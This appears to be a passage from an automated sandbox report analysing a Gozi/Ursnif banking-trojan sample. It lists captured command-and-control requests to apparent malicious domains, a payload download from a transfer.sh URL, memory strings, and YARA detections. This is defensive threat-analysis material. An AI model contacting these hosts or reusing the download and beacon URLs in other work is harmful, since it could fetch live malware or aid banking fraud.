                    Source: global trafficHTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
                    Source: global trafficHTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com
                    Source: RegAsm.exe, 00000008.00000003.412693608.0000000000E93000.00000004.00000001.sdmpString found in binary or memory: http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH
                    Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                    Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: RegAsm.exe, 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, control.exe, 0000001C.00000002.544075134.000001DC0EF2C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, rundll32.exe, 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                    Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cmgR
                    Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.ux2
                    Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobp/
                    Source: RuntimeBroker.exe, 00000029.00000000.607858316.00000163C251B000.00000004.00000001.sdmpString found in binary or memory: http://ns.micro/1
                    Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.537650333.0000020337C61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: gozi.exe, 00000002.00000002.328074082.0000000003263000.00000004.00000001.sdmpString found in binary or memory: http://transfer.sh
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: gozi.exe, 00000002.00000002.328992093.0000000007282000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000016.00000002.538900728.0000020337E6A000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000016.00000002.586306503.0000020347CCF000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh
                    Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh/get/3dvhcv/lia.exe
                    Source: gozi.exe, 00000002.00000002.328014285.00000000031F4000.00000004.00000001.sdmpString found in binary or memory: https://transfer.sh4jl
                    Source: unknownDNS traffic detected: queries for: transfer.sh
                    Source: global trafficHTTP traffic detected: GET /get/3dvhcv/lia.exe HTTP/1.1Host: transfer.shConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /g37w_2FYO/KW18Y37P4Dg_2F1TMh_2/FK2ujRayUy6lspI6qOC/AgWOSVQoUjByibFH6VxOps/v3Ehdrv875bm_/2Bs0w7UO/8HLDir_2FrS7hQvf7_2F_2F/dRVLAAfuPh/m30EKXD6FtreycZoi/lobTM_2FcJdc/YK8geqpXCxP/dDLbqs1jlQyVsA/bp_2Fxijgc04UGfwb6H7A/hHd5lPMnnVOlY1xb/cpTKFIgzAGJyGab/7_2BPVHreJHJUQdZTy/CjJC9x69g/tFYle1uxB8JrgYxIiF_2/BMgOKImH_2BEsdbiTm7/xqsfHc14yTZglOas0gOCoM/8tPVx3GttAeuK/bZvFimTpFp_2B/LS HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSHp3U9/VTOicK4Dg9CvfDD5/DOzqkKaYmXyqB_2/BBeVS9VS7cZ_2Bxp8N/QUqIP2qoG/d9YX0YxhQ9wrMxFsIM3_/2FpgIEySH_2F7iIla7P/RVB1W1dWGnBa303ekXLbS2/H9XWbOoIqxvpR/Y0oANlOz/wA_2FDoUg6f5pt9sPS8pXWN/S8nUx2g1cV/w178G4jzQvTUGix2J/FRZXUdQwbPuV/iCh6boYFIAo/eBnDiqYSbaisXu/CvhfCnnlGNsLFuBfY6dkH/EJQ5NM_2B10n/nvc8N HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
                    Source: global trafficHTTP traffic detected: GET /cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownHTTP traffic detected: POST /NmtPFuQd_2/BfdLYLn2BLCtH1Hsh/hg_2FVLDGfIg/gtHnWY07UvK/_2FGfiZdkTNp3n/qSVe2e02NbQuSngndCWZx/FHtx2JyPoVSWyJAF/Nf3MxwobjdKHeJw/QN32g1hXKaTKdLZpGQ/1rai86tHa/cARCkcyc0ZIXwpr6o7hy/9LscnpzGSQw_2BN65St/d5vH28LuyC5fwk6W58_2BJ/mW_2BjaYyboIc/4qfAAbea/H6DnQT_2FBDJuaMwLw_2Bis/Q5vm9_2Bsb/WNMn_2Bg9zRAyx8QD/EwO5ty_2BWJe/AeEgVlXP8KP/mEQSv1dRw/v0fxMe2Myiu1T/e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com
                    Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49743 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
                    Source: Yara matchFile source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

                    E-Banking Fraud:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
                    Source: Yara match